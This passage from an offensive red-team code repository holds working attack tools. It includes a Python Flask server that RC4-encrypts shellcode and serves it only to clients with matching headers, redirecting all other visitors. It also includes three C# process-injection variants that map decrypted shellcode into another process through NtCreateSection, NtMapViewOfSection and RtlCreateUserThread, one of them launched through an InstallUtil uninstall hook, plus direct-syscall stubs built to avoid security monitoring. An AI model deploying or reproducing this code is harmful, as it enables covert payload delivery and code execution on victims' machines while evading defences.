| ANSI_CYAN = '\033[96m' 12 | ANSI_GRN = '\033[92m' 13 | ANSI_CLR = '\033[0m' 14 | 15 | def __PrintStub(color, symbol, string, ret, fatal=False, end='\n'): 16 | print(f'{color}[{symbol}]> {string}{ANSI_CLR}', end=end) 17 | if fatal: 18 | os._exit(-1) 19 | else: 20 | return ret 21 | 22 | def Perror(s, end='\n'): 23 | return __PrintStub(ANSI_RED, '-', s, False, fatal=True, end=end) 24 | 25 | def Pwarn(s, end='\n'): 26 | return __PrintStub(ANSI_ORNG, '!', s, False, end=end) 27 | 28 | def Pinfo(s, end='\n'): 29 | return __PrintStub(ANSI_CYAN, '*', s, True, end=end) 30 | 31 | def Psuccess(s, end='\n'): 32 | return __PrintStub(ANSI_GRN, '+', s, True, end=end) 33 | 34 | def Banner(): 35 | print(''' 
36 | ██████╗ █████╗ ██╗███╗ ██╗ ██████╗ █████╗ ██╗ ██╗ ███████╗██████╗ 37 | ██╔══██╗██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ ██╔════╝██╔══██╗ 38 | ██████╔╝███████║██║██╔██╗ ██║██║ ███████║██║ ██║ █████╗ ██████╔╝ 39 | ██╔══██╗██╔══██║██║██║╚██╗██║██║ ██╔══██║██║ ██║ ██╔══╝ ██╔══██╗ 40 | ██║ ██║██║ ██║██║██║ ╚████║╚██████╗██║ ██║███████╗███████╗███████╗██║ ██║ 41 | ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝ 42 | @v1.1 43 | ''') 44 | 45 | def SigHandler(sig, frame): 46 | Pinfo('Goodbye!') 47 | os._exit(0) 48 | 49 | def __Listen(args, app): 50 | try: 51 | ctx = None 52 | if args.ssl_crt and args.ssl_key: 53 | ctx = (args.ssl_crt, args.ssl_key) 54 | app.run(args.address, args.port, threaded=True, use_reloader=False, ssl_context=ctx) 55 | except Exception as e: 56 | Perror(f'Failed to start the HTTP listener: {str(e)}') 57 | 58 | def TListen(args, app): 59 | tid = None 60 | 61 | Pinfo('Starting the server thread...') 62 | try: 63 | tid = threading.Thread(target=__Listen, args=(args, app,)) 64 | tid.daemon = True 65 | 66 | tid.start() 67 | except Exception as e: 68 | Perror(f'Failed to start the listener thread: {str(e)}.') 69 | sleep(0.3) 70 | Psuccess('Done.\n') 71 | 72 | return tid 73 | 74 | def InitFlask(args): 75 | log = logging.getLogger('werkzeug') 76 | log.setLevel(logging.ERROR) 77 | 78 | app = Flask(__name__) 79 | 80 | @app.route(args.uri) 81 | def SC(): 82 | r = redirect(INVALID_REDIR, code=302) 83 | 84 | if request.cookies.get('CONSENT') and request.cookies.get('CONSENT') == 'YES' and request.headers.get('Accept-Encoding') and request.headers.get('Accept-Encoding') == 'gzip, deflate': 85 | Psuccess(f'Good hit on {args.uri} from {request.remote_addr}!') 86 | r = send_file(ENC_FILE_NAME, mimetype='application/octet-stream') 87 | else: 88 | Pwarn(f'Suspicious hit on {args.uri} from {request.remote_addr}!') 89 | return r 90 | 91 | return app 92 | 93 | def CryptShellcode(file, key): 94 | shellcode = None 95 | cipher = 
ARC4.new(key.encode('utf-8')) 96 | 97 | with open(file, mode='rb') as fr: 98 | shellcode = fr.read() 99 | 100 | try: 101 | with open(ENC_FILE_NAME, mode='wb') as fw: 102 | fw.write(cipher.encrypt(shellcode)) 103 | except Exception as e: 104 | Perror(f'Failed to write encrypted shellcode to a file. Is the directory writable?') 105 | 106 | def ParseArgs(): 107 | parser = argparse.ArgumentParser() 108 | parser.add_argument('-a', '--address', type=str, required=True, help="Listener address") 109 | parser.add_argument('-p', '--port', type=int, required=True, help="Listener port") 110 | parser.add_argument('-u', '--uri', type=str, required=True, help="URI where shellcode will be retrieved from") 111 | parser.add_argument('-f', '--file', type=str, required=True, help="Shellcode file to drop") 112 | parser.add_argument('-k', '--key', type=str, required=True, help="Shellcode encryption key") 113 | parser.add_argument('--ssl_key', type=str, required=False, help="Path to an SSL certificate") 114 | parser.add_argument('--ssl_crt', type=str, required=False, help="Path to an SSL key") 115 | 116 | args = parser.parse_args() 117 | r = True 118 | if args.port <= 0 or args.port > 65535: 119 | r = Pwarn("Port argument needs to be an integer between 1 and 65535.") 120 | if (args.port > 0 and args.port <= 1024) and os.geteuid() != 0: 121 | r = Pwarn("Ports between 1 and 1024 require root permissions.") 122 | if '/' not in args.uri: 123 | r = Pwarn("Valid URI needs to have a / (e.g. 
/download)") 124 | if not os.path.isfile(args.file) or not os.access(args.file, os.R_OK): 125 | r = Pwarn("Shellcode file is inaccessible (check permissions).") 126 | if len(args.key) < 5: 127 | r = Pwarn("RC4 key needs to be at least 5 characters long.") 128 | if (args.ssl_key and not args.ssl_crt) or (args.ssl_crt and not args.ssl_key): 129 | r = Pwarn("For SSL both key and crt options need to be selected.") 130 | if args.ssl_key and (not os.path.isfile(args.ssl_key) or not os.access(args.ssl_key, os.R_OK)): 131 | r = Pwarn("SSL Key file is inaccessible (check permissions).") 132 | if args.ssl_crt and (not os.path.isfile(args.ssl_crt) or not os.access(args.ssl_crt, os.R_OK)): 133 | r = Pwarn("SSL Crt file is inaccessible (check permissions).") 134 | 135 | if not r: 136 | os._exit(-1) 137 | 138 | return args 139 | 140 | if __name__ == '__main__': 141 | signal.signal(signal.SIGINT, SigHandler) 142 | 143 | Banner() 144 | userArgs = ParseArgs() 145 | 146 | CryptShellcode(userArgs.file, userArgs.key) 147 | 148 | app = InitFlask(userArgs) 149 | tid = TListen(userArgs, app) 150 | tid.join() -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectInstallUtil/SharpSectionJect.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | public class SharpSectionJect 5 | { 6 | private const UInt32 SECTION_MAP_WRITE = 0x0002; 7 | private const UInt32 SECTION_MAP_READ = 0x0004; 8 | private const UInt32 SECTION_MAP_EXECUTE = 0x0008; 9 | 10 | private const uint PAGE_EXECUTE_READ = 0x00000020; 11 | private const uint PAGE_EXECUTE_READWRITE = 0x00000040; 12 | private const uint PAGE_READWRITE = 0x00000004; 13 | private const uint SEC_COMMIT = 0x8000000; 14 | private const uint PROCESS_ALL_ACCESS = 0x001F0FFF; 15 | 16 | private static byte[] RC4(byte[] key, byte[] data) 17 | { 18 | int a, i, j, k, tmp; 19 | int[] keyBuf, box; 20 | 
byte[] cipher; 21 | 22 | keyBuf = new int[256]; 23 | box = new int[256]; 24 | cipher = new byte[data.Length]; 25 | 26 | for (i = 0; i < 256; i++) 27 | { 28 | keyBuf[i] = key[i % key.Length]; 29 | box[i] = i; 30 | } 31 | for (j = i = 0; i < 256; i++) 32 | { 33 | j = (j + box[i] + keyBuf[i]) % 256; 34 | tmp = box[i]; 35 | box[i] = box[j]; 36 | box[j] = tmp; 37 | } 38 | for (a = j = i = 0; i < data.Length; i++) 39 | { 40 | a++; 41 | a %= 256; 42 | j += box[a]; 43 | j %= 256; 44 | tmp = box[a]; 45 | box[a] = box[j]; 46 | box[j] = tmp; 47 | k = box[((box[a] + box[j]) % 256)]; 48 | cipher[i] = (byte)(data[i] ^ k); 49 | } 50 | return cipher; 51 | } 52 | 53 | public static void Inj(string arg1, string arg2, string arg3) 54 | { 55 | var args = new string[] { arg1, arg2, arg3 }; //Dirty patch from the EXE codebase 56 | 57 | UInt32 size = 4096, sectionSize = size; 58 | IntPtr sectionHandle = IntPtr.Zero, localSectionAddress = IntPtr.Zero, remoteSectionAddress = IntPtr.Zero; 59 | ulong sectionOffset = 0; 60 | 61 | if (args.Length == 3) 62 | { 63 | var currProc = System.Diagnostics.Process.GetCurrentProcess(); 64 | var currProcHandle = currProc.Handle; 65 | var currProcSessionId = currProc.SessionId; 66 | 67 | NtCreateSection(ref sectionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, IntPtr.Zero, ref sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, IntPtr.Zero); 68 | NtMapViewOfSection(sectionHandle, currProcHandle, ref localSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_READWRITE); 69 | 70 | int tPid = -1; 71 | int _pid = -1; 72 | 73 | if (Int32.TryParse(args[0], out _pid)) 74 | tPid = _pid; 75 | else 76 | { 77 | var processes = System.Diagnostics.Process.GetProcessesByName(args[0].Replace(".exe", string.Empty)); 78 | 79 | if (processes.Length >= 1) 80 | { 81 | foreach (System.Diagnostics.Process proc in processes) 82 | { 83 | if (proc.SessionId == currProcSessionId) 84 | { 85 | tPid = proc.Id; 86 | break; 87 | } 
88 | } 89 | } 90 | } 91 | 92 | if (tPid >= 0) 93 | { 94 | IntPtr targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, tPid); 95 | 96 | if (targetHandle != IntPtr.Zero) 97 | { 98 | NtMapViewOfSection(sectionHandle, targetHandle, ref remoteSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_EXECUTE_READ); 99 | 100 | byte[] b64 = RC4(System.Text.Encoding.UTF8.GetBytes(args[2]), Convert.FromBase64String(args[1])); 101 | Marshal.Copy(b64, 0, localSectionAddress, b64.Length); 102 | 103 | IntPtr targetThreadHandle = IntPtr.Zero; 104 | RtlCreateUserThread(targetHandle, IntPtr.Zero, false, 0, IntPtr.Zero, IntPtr.Zero, remoteSectionAddress, IntPtr.Zero, ref targetThreadHandle, IntPtr.Zero); 105 | } 106 | else 107 | Console.WriteLine("Failed to open target process"); 108 | } 109 | else 110 | Console.WriteLine("Process with the name / PID of " + tPid + " is invalid."); 111 | } 112 | else 113 | Console.WriteLine(@"Usage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false SharpSectionJect.dll"); 114 | //msfvenom -p windows/x64/exec CMD=calc.exe -f raw EXITFUNC=thread | base64 -w0 115 | } 116 | 117 | [DllImport("kernel32.dll", SetLastError = true)] 118 | private static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 119 | 120 | [DllImport("ntdll.dll", SetLastError = true, ExactSpelling = true)] 121 | private static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); 122 | 123 | [DllImport("ntdll.dll", SetLastError = true)] 124 | private static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect); 125 | 126 | 
[DllImport("ntdll.dll", SetLastError = true)] 127 | private static extern IntPtr RtlCreateUserThread(IntPtr processHandle, IntPtr threadSecurity, bool createSuspended, Int32 stackZeroBits, IntPtr stackReserved, IntPtr stackCommit, IntPtr startAddress, IntPtr parameter, ref IntPtr threadHandle, IntPtr clientId); 128 | } 129 | 130 | [System.ComponentModel.RunInstaller(true)] 131 | public class Stub : System.Configuration.Install.Installer 132 | { 133 | public override void Uninstall(System.Collections.IDictionary savedState) 134 | { 135 | SharpSectionJect.Inj("", "", ""); 136 | } 137 | } 138 | -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJect/SharpSectionJect.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SharpSectionJect 5 | { 6 | public class SharpSectionJect 7 | { 8 | private const UInt32 SECTION_MAP_WRITE = 0x0002; 9 | private const UInt32 SECTION_MAP_READ = 0x0004; 10 | private const UInt32 SECTION_MAP_EXECUTE = 0x0008; 11 | 12 | private const uint PAGE_EXECUTE_READ = 0x00000020; 13 | private const uint PAGE_EXECUTE_READWRITE = 0x00000040; 14 | private const uint PAGE_READWRITE = 0x00000004; 15 | private const uint SEC_COMMIT = 0x8000000; 16 | private const uint PROCESS_ALL_ACCESS = 0x001F0FFF; 17 | 18 | //https://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4 19 | private static byte[] RC4(byte[] key, byte[] data) 20 | { 21 | int a, i, j, k, tmp; 22 | int[] keyBuf, box; 23 | byte[] cipher; 24 | 25 | keyBuf = new int[256]; 26 | box = new int[256]; 27 | cipher = new byte[data.Length]; 28 | 29 | for (i = 0; i < 256; i++) 30 | { 31 | keyBuf[i] = key[i % key.Length]; 32 | box[i] = i; 33 | } 34 | for (j = i = 0; i < 256; i++) 35 | { 36 | j = (j + box[i] + keyBuf[i]) % 256; 37 | tmp = box[i]; 38 | box[i] = box[j]; 39 | box[j] = tmp; 40 | } 41 | for (a = j = i = 0; i < data.Length; i++) 42 | { 
43 | a++; 44 | a %= 256; 45 | j += box[a]; 46 | j %= 256; 47 | tmp = box[a]; 48 | box[a] = box[j]; 49 | box[j] = tmp; 50 | k = box[((box[a] + box[j]) % 256)]; 51 | cipher[i] = (byte)(data[i] ^ k); 52 | } 53 | return cipher; 54 | } 55 | 56 | public static void Inj(string[] args) 57 | { 58 | UInt32 size = 4096, sectionSize = size; 59 | IntPtr sectionHandle = IntPtr.Zero, localSectionAddress = IntPtr.Zero, remoteSectionAddress = IntPtr.Zero; 60 | ulong sectionOffset = 0; 61 | 62 | if (args.Length == 3) 63 | { 64 | var currProc = System.Diagnostics.Process.GetCurrentProcess(); 65 | var currProcHandle = currProc.Handle; 66 | var currProcSessionId = currProc.SessionId; 67 | 68 | NtCreateSection(ref sectionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, IntPtr.Zero, ref sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, IntPtr.Zero); 69 | NtMapViewOfSection(sectionHandle, currProcHandle, ref localSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_READWRITE); 70 | 71 | int tPid = -1; 72 | 73 | if (Int32.TryParse(args[0], out int _pid)) 74 | tPid = _pid; 75 | else 76 | { 77 | var processes = System.Diagnostics.Process.GetProcessesByName(args[0].Replace(".exe", string.Empty)); 78 | 79 | if (processes.Length >= 1) 80 | { 81 | foreach (System.Diagnostics.Process proc in processes) 82 | { 83 | if (proc.SessionId == currProcSessionId) 84 | { 85 | tPid = proc.Id; 86 | break; 87 | } 88 | } 89 | } 90 | } 91 | 92 | if (tPid >= 0) 93 | { 94 | IntPtr targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, tPid); 95 | 96 | if (targetHandle != IntPtr.Zero) 97 | { 98 | NtMapViewOfSection(sectionHandle, targetHandle, ref remoteSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_EXECUTE_READ); 99 | 100 | byte[] b64 = RC4(System.Text.Encoding.UTF8.GetBytes(args[2]), Convert.FromBase64String(args[1])); 101 | Marshal.Copy(b64, 0, localSectionAddress, b64.Length); 102 | 103 | IntPtr targetThreadHandle 
= IntPtr.Zero; 104 | RtlCreateUserThread(targetHandle, IntPtr.Zero, false, 0, IntPtr.Zero, IntPtr.Zero, remoteSectionAddress, IntPtr.Zero, ref targetThreadHandle, IntPtr.Zero); 105 | } 106 | else 107 | Console.WriteLine("Failed to open target process"); 108 | } 109 | else 110 | Console.WriteLine("Process with the name / PID of " + tPid + " is invalid."); 111 | } 112 | else 113 | Console.WriteLine("Usage: p.exe "); 114 | //msfvenom -p windows/x64/exec CMD=calc.exe -f raw EXITFUNC=thread | base64 -w0 115 | } 116 | 117 | static void Main(string[] args) 118 | { 119 | Inj(args); 120 | } 121 | 122 | [DllImport("kernel32.dll", SetLastError = true)] 123 | private static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 124 | 125 | [DllImport("ntdll.dll", SetLastError = true, ExactSpelling = true)] 126 | private static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); 127 | 128 | [DllImport("ntdll.dll", SetLastError = true)] 129 | private static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect); 130 | 131 | [DllImport("ntdll.dll", SetLastError = true)] 132 | private static extern IntPtr RtlCreateUserThread(IntPtr processHandle, IntPtr threadSecurity, bool createSuspended, Int32 stackZeroBits, IntPtr stackReserved, IntPtr stackCommit, IntPtr startAddress, IntPtr parameter, ref IntPtr threadHandle, IntPtr clientId); 133 | } 134 | 135 | } -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectDLL/SharpSectionJectDLL.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using 
System.Runtime.InteropServices; 3 | 4 | namespace SharpSectionJectDLL 5 | { 6 | public class SharpSectionJectDLL 7 | { 8 | private const UInt32 SECTION_MAP_WRITE = 0x0002; 9 | private const UInt32 SECTION_MAP_READ = 0x0004; 10 | private const UInt32 SECTION_MAP_EXECUTE = 0x0008; 11 | 12 | private const uint PAGE_EXECUTE_READ = 0x00000020; 13 | private const uint PAGE_EXECUTE_READWRITE = 0x00000040; 14 | private const uint PAGE_READWRITE = 0x00000004; 15 | private const uint SEC_COMMIT = 0x8000000; 16 | private const uint PROCESS_ALL_ACCESS = 0x001F0FFF; 17 | 18 | //https://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4 19 | private static byte[] RC4(byte[] key, byte[] data) 20 | { 21 | int a, i, j, k, tmp; 22 | int[] keyBuf, box; 23 | byte[] cipher; 24 | 25 | keyBuf = new int[256]; 26 | box = new int[256]; 27 | cipher = new byte[data.Length]; 28 | 29 | for (i = 0; i < 256; i++) 30 | { 31 | keyBuf[i] = key[i % key.Length]; 32 | box[i] = i; 33 | } 34 | for (j = i = 0; i < 256; i++) 35 | { 36 | j = (j + box[i] + keyBuf[i]) % 256; 37 | tmp = box[i]; 38 | box[i] = box[j]; 39 | box[j] = tmp; 40 | } 41 | for (a = j = i = 0; i < data.Length; i++) 42 | { 43 | a++; 44 | a %= 256; 45 | j += box[a]; 46 | j %= 256; 47 | tmp = box[a]; 48 | box[a] = box[j]; 49 | box[j] = tmp; 50 | k = box[((box[a] + box[j]) % 256)]; 51 | cipher[i] = (byte)(data[i] ^ k); 52 | } 53 | return cipher; 54 | } 55 | public static void Inj(string arg1, string arg2, string arg3) 56 | { 57 | var args = new string [] { arg1, arg2, arg3 }; //Dirty patch from the EXE codebase 58 | 59 | UInt32 size = 4096, sectionSize = size; 60 | IntPtr sectionHandle = IntPtr.Zero, localSectionAddress = IntPtr.Zero, remoteSectionAddress = IntPtr.Zero; 61 | ulong sectionOffset = 0; 62 | 63 | if (args.Length == 3) 64 | { 65 | var currProc = System.Diagnostics.Process.GetCurrentProcess(); 66 | var currProcHandle = currProc.Handle; 67 | var currProcSessionId = currProc.SessionId; 68 | 69 | NtCreateSection(ref sectionHandle, 
SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, IntPtr.Zero, ref sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, IntPtr.Zero); 70 | NtMapViewOfSection(sectionHandle, currProcHandle, ref localSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_READWRITE); 71 | 72 | int tPid = -1; 73 | 74 | if (Int32.TryParse(args[0], out int _pid)) 75 | tPid = _pid; 76 | else 77 | { 78 | var processes = System.Diagnostics.Process.GetProcessesByName(args[0].Replace(".exe", string.Empty)); 79 | 80 | if (processes.Length >= 1) 81 | { 82 | foreach (System.Diagnostics.Process proc in processes) 83 | { 84 | if (proc.SessionId == currProcSessionId) 85 | { 86 | tPid = proc.Id; 87 | break; 88 | } 89 | } 90 | } 91 | } 92 | 93 | if (tPid >= 0) 94 | { 95 | IntPtr targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, tPid); 96 | 97 | if (targetHandle != IntPtr.Zero) 98 | { 99 | NtMapViewOfSection(sectionHandle, targetHandle, ref remoteSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_EXECUTE_READ); 100 | 101 | byte[] b64 = RC4(System.Text.Encoding.UTF8.GetBytes(args[2]), Convert.FromBase64String(args[1])); 102 | Marshal.Copy(b64, 0, localSectionAddress, b64.Length); 103 | 104 | IntPtr targetThreadHandle = IntPtr.Zero; 105 | RtlCreateUserThread(targetHandle, IntPtr.Zero, false, 0, IntPtr.Zero, IntPtr.Zero, remoteSectionAddress, IntPtr.Zero, ref targetThreadHandle, IntPtr.Zero); 106 | } 107 | else 108 | Console.WriteLine("Failed to open target process"); 109 | } 110 | else 111 | Console.WriteLine("Process with the name / PID of " + tPid + " is invalid."); 112 | } 113 | else 114 | Console.WriteLine(@"Usage: [SharpSectionJectDLL.SharpSectionJectDLL]::Inj(, , )"); 115 | //msfvenom -p windows/x64/exec CMD=calc.exe -f raw EXITFUNC=thread | base64 -w0 116 | } 117 | 118 | [DllImport("kernel32.dll", SetLastError = true)] 119 | private static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int 
processId); 120 | 121 | [DllImport("ntdll.dll", SetLastError = true, ExactSpelling = true)] 122 | private static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); 123 | 124 | [DllImport("ntdll.dll", SetLastError = true)] 125 | private static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect); 126 | 127 | [DllImport("ntdll.dll", SetLastError = true)] 128 | private static extern IntPtr RtlCreateUserThread(IntPtr processHandle, IntPtr threadSecurity, bool createSuspended, Int32 stackZeroBits, IntPtr stackReserved, IntPtr stackCommit, IntPtr startAddress, IntPtr parameter, ref IntPtr threadHandle, IntPtr clientId); 129 | } 130 | } 131 | -------------------------------------------------------------------------------- /Ballista/Ballista/Syscalls.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | using System.ComponentModel; 4 | 5 | using static Ballista.Native; 6 | using static Ballista.Releases; 7 | 8 | namespace Ballista 9 | { 10 | //Syscall inspiration from hxxps://jhalon.github.io/utilizing-syscalls-in-csharp-1/ 11 | class Syscalls 12 | { 13 | private static byte[] bSyscallSkeleton = 14 | { 15 | 0x4C, 0x8B, 0xD1, // mov r10, rcx 16 | 0xB8, 0xff, 0x00, 0x00, 0x00, // mov eax, 0xff (0xff is a placeholder byte at index 4 for other syscalls) 17 | 0x0F, 0x05, // syscall 18 | 0xC3 // ret 19 | }; 20 | 21 | public struct Delegates 22 | { 23 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 24 | public delegate NTSTATUS NtOpenProcess(ref IntPtr ProcessHandle, UInt32 AccessMask, ref OBJECT_ATTRIBUTES ObjectAttributes, ref 
CLIENT_ID ClientId); 25 | 26 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 27 | public delegate NTSTATUS NtCreateThreadEx(ref IntPtr threadHandle, UInt32 desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool inCreateSuspended, Int32 stackZeroBits, Int32 sizeOfStack, Int32 maximumStackSize, IntPtr attributeList); 28 | 29 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 30 | public delegate NTSTATUS NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); 31 | 32 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 33 | public delegate NTSTATUS NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect); 34 | } 35 | 36 | public static NTSTATUS NtOpenProcess(int release, ref IntPtr ProcessHandle, UInt32 AccessMask, ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId) 37 | { 38 | bSyscallSkeleton[4] = syscallOffsets[release]["NtOpenProcess"]; //NtOpenProcess 39 | byte[] syscall = bSyscallSkeleton; 40 | 41 | unsafe 42 | { 43 | fixed (byte* ptr = syscall) 44 | { 45 | IntPtr memoryAddress = (IntPtr)ptr; 46 | 47 | if (!VirtualProtect(memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint lpflOldProtect)) 48 | { 49 | throw new Win32Exception(); 50 | } 51 | 52 | Delegates.NtOpenProcess fp = (Delegates.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtOpenProcess)); 53 | 54 | return (NTSTATUS)fp(ref ProcessHandle, AccessMask, ref ObjectAttributes, ref ClientId); 55 | } 56 | } 57 | } 58 | public static NTSTATUS NtCreateThreadEx(int release, ref IntPtr threadHandle, UInt32 desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr 
startAddress, IntPtr parameter, bool inCreateSuspended, Int32 stackZeroBits, Int32 sizeOfStack, Int32 maximumStackSize, IntPtr attributeList) 59 | { 60 | bSyscallSkeleton[4] = syscallOffsets[release]["NtCreateThreadEx"]; //NtCreateThreadEx 61 | byte[] syscall = bSyscallSkeleton; 62 | 63 | unsafe 64 | { 65 | fixed (byte* ptr = syscall) 66 | { 67 | IntPtr memoryAddress = (IntPtr)ptr; 68 | 69 | if (!VirtualProtect(memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint lpflOldProtect)) 70 | { 71 | throw new Win32Exception(); 72 | } 73 | 74 | Delegates.NtCreateThreadEx fp = (Delegates.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateThreadEx)); 75 | 76 | return (NTSTATUS)fp(ref threadHandle, desiredAccess, objectAttributes, processHandle, startAddress, parameter, inCreateSuspended, stackZeroBits, sizeOfStack, maximumStackSize, attributeList); 77 | } 78 | } 79 | } 80 | public static NTSTATUS NtCreateSection(int release, ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle) 81 | { 82 | bSyscallSkeleton[4] = syscallOffsets[release]["NtCreateSection"]; 83 | byte[] syscall = bSyscallSkeleton; 84 | 85 | unsafe 86 | { 87 | fixed (byte* ptr = syscall) 88 | { 89 | IntPtr memoryAddress = (IntPtr)ptr; 90 | 91 | if (!VirtualProtect(memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint lpflOldProtect)) 92 | { 93 | throw new Win32Exception(); 94 | } 95 | 96 | Delegates.NtCreateSection fp = (Delegates.NtCreateSection)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateSection)); 97 | 98 | return (NTSTATUS)fp(ref SectionHandle, DesiredAccess, ObjectAttributes, ref MaximumSize, SectionPageProtection, AllocationAttributes, FileHandle); 99 | } 100 | } 101 | } 102 | public static NTSTATUS NtMapViewOfSection(int release, IntPtr SectionHandle, IntPtr ProcessHandle, 
ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect) 103 | { 104 | bSyscallSkeleton[4] = syscallOffsets[release]["NtMapViewOfSection"]; 105 | byte[] syscall = bSyscallSkeleton; 106 | 107 | unsafe 108 | { 109 | fixed (byte* ptr = syscall) 110 | { 111 | IntPtr memoryAddress = (IntPtr)ptr; 112 | 113 | if (!VirtualProtect(memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint lpflOldProtect)) 114 | { 115 | throw new Win32Exception(); 116 | } 117 | 118 | Delegates.NtMapViewOfSection fp = (Delegates.NtMapViewOfSection)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtMapViewOfSection)); 119 | 120 | return (NTSTATUS)fp(SectionHandle, ProcessHandle, ref BaseAddress, ZeroBits, CommitSize, out SectionOffset, out ViewSize, InheritDisposition, AllocationType, Win32Protect); 121 | } 122 | } 123 | } 124 | } 125 | } 126 | -------------------------------------------------------------------------------- /RainCaller/.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 
